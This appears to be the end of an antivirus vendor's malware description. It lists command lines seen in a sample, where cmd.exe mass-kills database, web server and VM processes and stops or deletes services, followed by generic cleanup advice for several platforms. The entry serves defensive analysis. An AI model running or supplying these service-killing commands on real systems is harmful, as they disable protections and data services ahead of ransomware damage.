  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & ...
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingser...
  • '<SYSTEM32>\cmd.exe' /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer ...
  • '<SYSTEM32>\cmd.exe' /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Servi...
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusb...
  • '<SYSTEM32>\net1.exe' stop UTUService

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and any removable media you use.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk, mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Boot your smartphone or tablet in safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install Dr.Web for Android on the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.
